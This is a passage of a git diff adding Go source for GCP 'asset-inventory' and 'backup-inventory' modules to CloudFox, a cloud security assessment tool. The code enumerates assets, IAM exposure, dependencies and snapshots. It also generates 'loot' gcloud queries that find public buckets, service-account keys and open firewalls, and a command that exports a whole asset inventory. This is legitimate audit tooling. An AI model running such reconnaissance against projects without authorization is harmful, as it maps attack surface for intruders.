+ assetservice "github.com/BishopFox/cloudfox/gcp/services/assetService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + "google.golang.org/api/iterator" +) + +var ( + assetTypes []string + showCounts bool + checkIAM bool + showDependencies bool + showAll bool +) + +var GCPAssetInventoryCommand = &cobra.Command{ + Use: globals.GCP_ASSET_INVENTORY_MODULE_NAME, + Aliases: []string{"assets", "cai", "resource-graph"}, + Short: "Deep asset analysis with IAM and dependencies (requires Cloud Asset API)", + Long: `Deep resource analysis using Cloud Asset Inventory API. + +USE THIS COMMAND WHEN: +- You need IAM policy analysis (public access detection) +- You want to analyze resource dependencies and cross-project relationships +- You need to filter by specific asset types +- Cloud Asset API is enabled in your projects + +REQUIRES: Cloud Asset API (cloudasset.googleapis.com) to be enabled. +To enable: gcloud services enable cloudasset.googleapis.com --project=PROJECT_ID + +If Cloud Asset API is not enabled, use 'inventory' command instead for a quick +overview that works without the API. + +FEATURES: +- Lists all assets in a project (complete coverage via Asset API) +- Provides asset counts by type (--counts) +- Checks IAM policies for public access (--iam) +- Analyzes resource dependencies and cross-project relationships (--dependencies) +- Supports filtering by asset type (--types) +- Generates query templates for common security use cases + +Flags can be combined to run multiple analyses in a single run. + +Examples: + cloudfox gcp asset-inventory -p my-project + cloudfox gcp asset-inventory -p my-project --counts + cloudfox gcp asset-inventory -p my-project --iam + cloudfox gcp asset-inventory -p my-project --dependencies + cloudfox gcp asset-inventory -p my-project --all + cloudfox gcp asset-inventory -A --iam # All projects, check public access + cloudfox gcp asset-inventory -p my-project --types compute.googleapis.com/Instance,storage.googleapis.com/Bucket`, + Run: runGCPAssetInventoryCommand, +} + +func init() { + GCPAssetInventoryCommand.Flags().StringSliceVar(&assetTypes, "types", []string{}, "Filter by asset types (comma-separated)") + GCPAssetInventoryCommand.Flags().BoolVar(&showCounts, "counts", false, "Show asset counts by type") + GCPAssetInventoryCommand.Flags().BoolVar(&checkIAM, "iam", false, "Check IAM policies for public access") + GCPAssetInventoryCommand.Flags().BoolVar(&showDependencies, "dependencies", false, "Analyze resource dependencies and cross-project relationships") + GCPAssetInventoryCommand.Flags().BoolVar(&showAll, "all", false, "Run all analyses (counts, IAM, dependencies)") +} + +// ResourceDependency represents a dependency between two resources +type ResourceDependency struct { + SourceResource string + SourceType string + TargetResource string + TargetType string + DependencyType string // uses, references, contains + ProjectID string +} + +// CrossProjectResource represents a resource accessed from multiple projects +type CrossProjectResource struct { + ResourceName string + ResourceType string + OwnerProject string + AccessedFrom []string +} + +type AssetInventoryModule struct { + gcpinternal.BaseGCPModule + ProjectAssets map[string][]assetservice.AssetInfo // projectID -> assets + ProjectTypeCounts map[string][]assetservice.AssetTypeCount // projectID -> counts + ProjectDependencies map[string][]ResourceDependency // projectID -> dependencies + CrossProject []CrossProjectResource // global (cross-project by nature) + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type AssetInventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AssetInventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AssetInventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPAssetInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ASSET_INVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &AssetInventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectAssets: make(map[string][]assetservice.AssetInfo), + ProjectTypeCounts: make(map[string][]assetservice.AssetTypeCount), + ProjectDependencies: make(map[string][]ResourceDependency), + CrossProject: []CrossProjectResource{}, + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *AssetInventoryModule) getAllAssets() []assetservice.AssetInfo { + var all []assetservice.AssetInfo + for _, assets := range m.ProjectAssets { + all = append(all, assets...) + } + return all +} + +func (m *AssetInventoryModule) getAllTypeCounts() []assetservice.AssetTypeCount { + // Merge counts from all projects + countMap := make(map[string]int) + for _, counts := range m.ProjectTypeCounts { + for _, c := range counts { + countMap[c.AssetType] += c.Count + } + } + + var all []assetservice.AssetTypeCount + for assetType, count := range countMap { + all = append(all, assetservice.AssetTypeCount{ + AssetType: assetType, + Count: count, + }) + } + return all +} + +func (m *AssetInventoryModule) getAllDependencies() []ResourceDependency { + var all []ResourceDependency + for _, deps := range m.ProjectDependencies { + all = append(all, deps...) + } + return all +} + +func (m *AssetInventoryModule) initializeLootForProject(projectID string) { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["asset-inventory-details"] = &internal.LootFile{ + Name: "asset-inventory-details", + Contents: "# Cloud Asset Inventory Details\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["asset-inventory-commands"] = &internal.LootFile{ + Name: "asset-inventory-commands", + Contents: "# Cloud Asset Inventory Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } +} + +func (m *AssetInventoryModule) Execute(ctx context.Context, logger internal.Logger) { + // If --all is set, enable all flags + if showAll { + showCounts = true + checkIAM = true + showDependencies = true + } + + // If no flags set, default to basic asset listing + noFlagsSet := !showCounts && !checkIAM && !showDependencies + + // Run requested analyses + if showCounts { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectCounts) + } + + if checkIAM { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectIAM) + } else if noFlagsSet { + // Only run basic listing if no flags and IAM not requested (IAM includes basic info) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProject) + } + + if showDependencies { + m.processProjectsDependencies(ctx, logger) + } + + // Build summary message + var summaryParts []string + + allTypeCounts := m.getAllTypeCounts() + if len(allTypeCounts) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset type(s)", len(allTypeCounts))) + } + + allAssets := m.getAllAssets() + if len(allAssets) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset(s)", len(allAssets))) + } + + if checkIAM { + publicCount := 0 + for _, asset := range allAssets { + if asset.PublicAccess { + publicCount++ + } + } + if publicCount > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d with public access", publicCount)) + } + } + + allDeps := m.getAllDependencies() + if len(allDeps) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d dependencies", len(allDeps))) + } + + if len(m.CrossProject) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d cross-project resources", len(m.CrossProject))) + } + + if len(summaryParts) == 0 { + logger.InfoM("No assets found", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %s", strings.Join(summaryParts, ", ")), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *AssetInventoryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + + svc := assetservice.New() + assets, err := svc.ListAssets(projectID, assetTypes) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectAssets[projectID] = append(m.ProjectAssets[projectID], assets...) + for _, asset := range assets { + m.addToLoot(projectID, asset) + } + m.mu.Unlock() +} + +func (m *AssetInventoryModule) processProjectIAM(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating assets with IAM in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + + svc := assetservice.New() + assets, err := svc.ListAssetsWithIAM(projectID, assetTypes) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets with IAM in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectAssets[projectID] = append(m.ProjectAssets[projectID], assets...) + for _, asset := range assets { + m.addToLoot(projectID, asset) + } + m.mu.Unlock() +} + +func (m *AssetInventoryModule) processProjectCounts(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Counting assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + + svc := assetservice.New() + counts, err := svc.GetAssetTypeCounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not count assets in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectTypeCounts[projectID] = counts + m.mu.Unlock() +} + +// processProjectsDependencies analyzes assets with full dependency tracking +func (m *AssetInventoryModule) processProjectsDependencies(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing assets and dependencies...", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + + assetClient, err := asset.NewClient(ctx) + if err != nil { + parsedErr := gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + "Could not create Cloud Asset client") + return + } + defer assetClient.Close() + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProjectWithDependencies(ctx, project, assetClient, logger) + }(projectID) + } + wg.Wait() + + // Analyze cross-project dependencies + m.analyzeCrossProjectResources() + + // Generate query templates + m.generateQueryTemplates() +} + +func (m *AssetInventoryModule) processProjectWithDependencies(ctx context.Context, projectID string, assetClient *asset.Client, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing dependencies in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + + parent := fmt.Sprintf("projects/%s", projectID) + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + PageSize: 500, + } + + it := assetClient.ListAssets(ctx, req) + + for { + assetItem, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets in project %s", projectID)) + break + } + + // Convert to AssetInfo for consistency + assetInfo := assetservice.AssetInfo{ + Name: assetItem.Name, + AssetType: assetItem.AssetType, + ProjectID: projectID, + } + + if assetItem.Resource != nil { + assetInfo.Location = assetItem.Resource.Location + } + + m.mu.Lock() + m.ProjectAssets[projectID] = append(m.ProjectAssets[projectID], assetInfo) + m.mu.Unlock() + + // Analyze dependencies + m.analyzeAssetDependencies(assetItem, projectID) + } +} + +func (m *AssetInventoryModule) analyzeAssetDependencies(assetItem *assetpb.Asset, projectID string) { + if assetItem.Resource == nil || assetItem.Resource.Data == nil { + return + } + + // Common dependency patterns + dependencyFields := map[string]string{ + "network": "uses", + "subnetwork": "uses", + "serviceAccount": "uses", + "disk": "uses", + "snapshot": "references", + "image": "references", + "keyRing": "uses", + "cryptoKey": "uses", + "topic": "references", + "subscription": "references", + "bucket": "uses", + "dataset": "references", + "cluster": "contains", + } + + for field, depType := range dependencyFields { + if value, ok := assetItem.Resource.Data.Fields[field]; ok { + targetResource := value.GetStringValue() + if targetResource != "" { + dependency := ResourceDependency{ + SourceResource: assetItem.Name, + SourceType: assetItem.AssetType, + TargetResource: targetResource, + TargetType: m.inferResourceType(field), + DependencyType: depType, + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectDependencies[projectID] = append(m.ProjectDependencies[projectID], dependency) + m.mu.Unlock() + } + } + } +} + +func (m *AssetInventoryModule) inferResourceType(fieldName string) string { + typeMap := map[string]string{ + "network": "compute.googleapis.com/Network", + "subnetwork": "compute.googleapis.com/Subnetwork", + "serviceAccount": "iam.googleapis.com/ServiceAccount", + "disk": "compute.googleapis.com/Disk", + "snapshot": "compute.googleapis.com/Snapshot", + "image": "compute.googleapis.com/Image", + "keyRing": "cloudkms.googleapis.com/KeyRing", + "cryptoKey": "cloudkms.googleapis.com/CryptoKey", + "topic": "pubsub.googleapis.com/Topic", + "subscription": "pubsub.googleapis.com/Subscription", + "bucket": "storage.googleapis.com/Bucket", + "dataset": "bigquery.googleapis.com/Dataset", + "cluster": "container.googleapis.com/Cluster", + } + + if assetType, ok := typeMap[fieldName]; ok { + return assetType + } + return "unknown" +} + +func (m *AssetInventoryModule) analyzeCrossProjectResources() { + m.mu.Lock() + defer m.mu.Unlock() + + targetToSources := make(map[string][]string) + targetToType := make(map[string]string) + + allDeps := m.getAllDependencies() + for _, dep := range allDeps { + targetProject := m.extractProjectFromResource(dep.TargetResource) + if targetProject != "" && targetProject != dep.ProjectID { + targetToSources[dep.TargetResource] = append(targetToSources[dep.TargetResource], dep.ProjectID) + targetToType[dep.TargetResource] = dep.TargetType + } + } + + for target, sources := range targetToSources { + crossProject := CrossProjectResource{ + ResourceName: target, + ResourceType: targetToType[target], + OwnerProject: m.extractProjectFromResource(target), + AccessedFrom: sources, + } + + m.CrossProject = append(m.CrossProject, crossProject) + } +} + +func (m *AssetInventoryModule) extractProjectFromResource(resource string) string { + if strings.Contains(resource, "projects/") { + parts := strings.Split(resource, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *AssetInventoryModule) extractResourceName(resource string) string { + parts := strings.Split(resource, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return resource +} + +func (m *AssetInventoryModule) generateQueryTemplates() { + templates := []struct { + Name string + Description string + Query string + }{ + {"Public Storage Buckets", "Find all public GCS buckets", `resource.type="storage.googleapis.com/Bucket" AND resource.data.iamConfiguration.uniformBucketLevelAccess.enabled=false`}, + {"VMs with External IPs", "Find compute instances with external IP addresses", `resource.type="compute.googleapis.com/Instance" AND resource.data.networkInterfaces.accessConfigs:*`}, + {"Service Account Keys", "Find all user-managed service account keys", `resource.type="iam.googleapis.com/ServiceAccountKey" AND resource.data.keyType="USER_MANAGED"`}, + {"Firewall Rules - Open to Internet", "Find firewall rules allowing 0.0.0.0/0", `resource.type="compute.googleapis.com/Firewall" AND resource.data.sourceRanges:"0.0.0.0/0"`}, + {"Cloud SQL - Public IPs", "Find Cloud SQL instances with public IP", `resource.type="sqladmin.googleapis.com/Instance" AND resource.data.settings.ipConfiguration.ipv4Enabled=true`}, + {"Unencrypted Disks", "Find disks without customer-managed encryption", `resource.type="compute.googleapis.com/Disk" AND NOT resource.data.diskEncryptionKey:*`}, + {"GKE Clusters - Legacy Auth", "Find GKE clusters with legacy authentication", `resource.type="container.googleapis.com/Cluster" AND resource.data.legacyAbac.enabled=true`}, + } + + // Add templates and export commands to each project's loot + for _, projectID := range m.ProjectIDs { + m.mu.Lock() + m.initializeLootForProject(projectID) + + if lootFile := m.LootMap[projectID]["asset-inventory-commands"]; lootFile != nil { + for _, t := range templates { + lootFile.Contents += fmt.Sprintf( + "# %s - %s\ngcloud asset search-all-resources --scope=projects/%s --query='%s'\n\n", + t.Name, t.Description, projectID, t.Query, + ) + } + + lootFile.Contents += "# Export complete asset inventory\n" + lootFile.Contents += fmt.Sprintf( + "gcloud asset export --project=%s --content-type=resource --output-path=gs://BUCKET_NAME/%s-assets.json\n", + projectID, projectID, + ) + } + m.mu.Unlock() + } +} + +func (m *AssetInventoryModule) addToLoot(projectID string, asset assetservice.AssetInfo) { + if lootFile := m.LootMap[projectID]["asset-inventory-details"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# ASSET: %s\n"+ + "# =============================================================================\n"+ + "# Type: %s\n# Project: %s\n# Location: %s\n", + asset.Name, asset.AssetType, asset.ProjectID, asset.Location) + + if asset.PublicAccess { + lootFile.Contents += "# Public Access: Yes\n" + } + lootFile.Contents += "\n" + } +} + +func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *AssetInventoryModule) buildCountsTable(counts []assetservice.AssetTypeCount) *internal.TableFile { + if len(counts) == 0 { + return nil + } + + // Sort by count descending + sort.Slice(counts, func(i, j int) bool { + return counts[i].Count > counts[j].Count + }) + + header := []string{"Asset Type", "Count"} + var body [][]string + for _, tc := range counts { + body = append(body, []string{ + tc.AssetType, + fmt.Sprintf("%d", tc.Count), + }) + } + + return &internal.TableFile{ + Name: "asset-counts", + Header: header, + Body: body, + } +} + +func (m *AssetInventoryModule) buildAssetsTable(assets []assetservice.AssetInfo) []internal.TableFile { + var tables []internal.TableFile + if len(assets) == 0 { + return tables + } + + if checkIAM { + header := []string{"Project", "Name", "Asset Type", "Location", "IAM Binding Role", "IAM Binding Principal", "Public"} + var body [][]string + for _, asset := range assets { + publicAccess := "No" + if asset.PublicAccess { + publicAccess = "Yes" + } + + if len(asset.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) + + // Public assets table + var publicBody [][]string + for _, asset := range assets { + if asset.PublicAccess { + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + publicBody = append(publicBody, []string{ + m.GetProjectName(asset.ProjectID), + asset.Name, + asset.AssetType, + binding.Role, + member, + }) + } + } + } + } + } + + if len(publicBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-assets", + Header: []string{"Project", "Name", "Asset Type", "IAM Binding Role", "IAM Binding Principal"}, + Body: publicBody, + }) + } + } else { + header := []string{"Project", "Name", "Asset Type", "Location"} + var body [][]string + for _, asset := range assets { + body = append(body, []string{ + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + }) + } + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) + } + + return tables +} + +func (m *AssetInventoryModule) buildDependenciesTable(deps []ResourceDependency) *internal.TableFile { + if len(deps) == 0 { + return nil + } + + depsHeader := []string{"Project", "Source", "Dependency Type", "Target", "Target Type"} + var depsBody [][]string + for _, d := range deps { + depsBody = append(depsBody, []string{ + m.GetProjectName(d.ProjectID), + m.extractResourceName(d.SourceResource), + d.DependencyType, + m.extractResourceName(d.TargetResource), + assetservice.ExtractAssetTypeShort(d.TargetType), + }) + } + + return &internal.TableFile{ + Name: "asset-dependencies", + Header: depsHeader, + Body: depsBody, + } +} + +func (m *AssetInventoryModule) buildCrossProjectTable() *internal.TableFile { + if len(m.CrossProject) == 0 { + return nil + } + + crossHeader := []string{"Resource", "Type", "Owner Project", "Accessed From"} + var crossBody [][]string + for _, c := range m.CrossProject { + crossBody = append(crossBody, []string{ + m.extractResourceName(c.ResourceName), + assetservice.ExtractAssetTypeShort(c.ResourceType), + c.OwnerProject, + strings.Join(c.AccessedFrom, ", "), + }) + } + + return &internal.TableFile{ + Name: "cross-project-resources", + Header: crossHeader, + Body: crossBody, + } +} + +func (m *AssetInventoryModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if counts, ok := m.ProjectTypeCounts[projectID]; ok { + if table := m.buildCountsTable(counts); table != nil { + tableFiles = append(tableFiles, *table) + } + } + + if assets, ok := m.ProjectAssets[projectID]; ok { + tableFiles = append(tableFiles, m.buildAssetsTable(assets)...) + } + + if deps, ok := m.ProjectDependencies[projectID]; ok { + if table := m.buildDependenciesTable(deps); table != nil { + tableFiles = append(tableFiles, *table) + } + } + + return tableFiles +} + +func (m *AssetInventoryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectAssets { + projectIDs[projectID] = true + } + for projectID := range m.ProjectTypeCounts { + projectIDs[projectID] = true + } + for projectID := range m.ProjectDependencies { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = AssetInventoryOutput{Table: tableFiles, Loot: lootFiles} + } + + // Add cross-project table at org level if we have hierarchy and cross-project data + if crossTable := m.buildCrossProjectTable(); crossTable != nil && m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID := m.Hierarchy.Organizations[0].ID + outputData.OrgLevelData[orgID] = AssetInventoryOutput{ + Table: []internal.TableFile{*crossTable}, + Loot: nil, + } + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } +} + +func (m *AssetInventoryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + allCounts := m.getAllTypeCounts() + if table := m.buildCountsTable(allCounts); table != nil { + tables = append(tables, *table) + } + + allAssets := m.getAllAssets() + tables = append(tables, m.buildAssetsTable(allAssets)...) + + allDeps := m.getAllDependencies() + if table := m.buildDependenciesTable(allDeps); table != nil { + tables = append(tables, *table) + } + + if table := m.buildCrossProjectTable(); table != nil { + tables = append(tables, *table) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := AssetInventoryOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } +} diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go new file mode 100644 index 00000000..b06d4019 --- /dev/null +++ b/gcp/commands/backupinventory.go @@ -0,0 +1,885 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" + sqladmin "google.golang.org/api/sqladmin/v1beta4" +) + +// Module name constant +const GCP_BACKUPINVENTORY_MODULE_NAME string = "backup-inventory" + +var GCPBackupInventoryCommand = &cobra.Command{ + Use: GCP_BACKUPINVENTORY_MODULE_NAME, + Aliases: []string{"backups", "backup", "snapshots", "dr"}, + Short: "Enumerate backup policies, protected resources, and identify backup gaps", + Long: `Inventory backup and disaster recovery configurations across GCP resources. + +Features: +- Compute Engine disk snapshots and snapshot schedules +- Cloud SQL automated backups and point-in-time recovery +- Identifies unprotected resources (no backup coverage) +- Analyzes backup retention policies +- Checks for stale or failing backups`, + Run: runGCPBackupInventoryCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type BackupResource struct { + ProjectID string + Name string + ResourceType string // compute-disk, cloudsql-instance + Location string + SizeGB int64 + Protected bool + BackupType string // snapshot, automated, none + Schedule string + RetentionDays int + LastBackup string + BackupCount int + BackupStatus string + PITREnabled bool + BackupLocation string +} + +type IAMBinding struct { + Role string + Members []string +} + +type ComputeSnapshot struct { + ProjectID string + Name string + SourceDisk string + Status string + DiskSizeGB int64 + StorageBytes int64 + CreationTime string + StorageLocats []string + AutoCreated bool + SnapshotType string + IAMBindings []IAMBinding + PublicAccess bool + EncryptionType string + KMSKeyName string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type BackupInventoryModule struct { + gcpinternal.BaseGCPModule + + ProjectResources map[string][]BackupResource // projectID -> resources + ProjectSnapshots map[string][]ComputeSnapshot // projectID -> snapshots + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex + + // Tracking maps + disksWithBackups map[string]bool + sqlWithBackups map[string]bool + allDisks map[string]diskInfo + allSQLInstances map[string]sqlInstanceInfo +} + +type diskInfo struct { + SizeGB int64 + Zone string + ProjectID string + Name string +} + +type sqlInstanceInfo struct { + ProjectID string + Region string +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type BackupInventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BackupInventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BackupInventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPBackupInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_BACKUPINVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &BackupInventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectResources: make(map[string][]BackupResource), + ProjectSnapshots: make(map[string][]ComputeSnapshot), + LootMap: make(map[string]map[string]*internal.LootFile), + disksWithBackups: make(map[string]bool), + sqlWithBackups: make(map[string]bool), + allDisks: make(map[string]diskInfo), + allSQLInstances: make(map[string]sqlInstanceInfo), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Inventorying backup configurations...", GCP_BACKUPINVENTORY_MODULE_NAME) + + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + return + } + + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create SQL Admin service: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + } + } + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, sqlService, logger) + }(projectID) + } + wg.Wait() + + // Identify unprotected resources + m.identifyUnprotectedResources() + + allResources := m.getAllResources() + allSnapshots := m.getAllSnapshots() + + if len(allResources) == 0 && len(allSnapshots) == 0 { + logger.InfoM("No backup data found", GCP_BACKUPINVENTORY_MODULE_NAME) + return + } + + // Count protected vs unprotected + protectedCount := 0 + unprotectedCount := 0 + for _, r := range allResources { + if r.Protected { + protectedCount++ + } else { + unprotectedCount++ + } + } + + // Count public snapshots + publicSnapshotCount := 0 + for _, s := range allSnapshots { + if s.PublicAccess { + publicSnapshotCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d resource(s): %d protected, %d unprotected, %d snapshot(s)", + len(allResources), protectedCount, unprotectedCount, len(allSnapshots)), GCP_BACKUPINVENTORY_MODULE_NAME) + + if unprotectedCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d resource(s) without backup coverage", unprotectedCount), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + if publicSnapshotCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible snapshot(s)!", publicSnapshotCount), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BackupInventoryModule) getAllResources() []BackupResource { + var all []BackupResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) + } + return all +} + +func (m *BackupInventoryModule) getAllSnapshots() []ComputeSnapshot { + var all []ComputeSnapshot + for _, snapshots := range 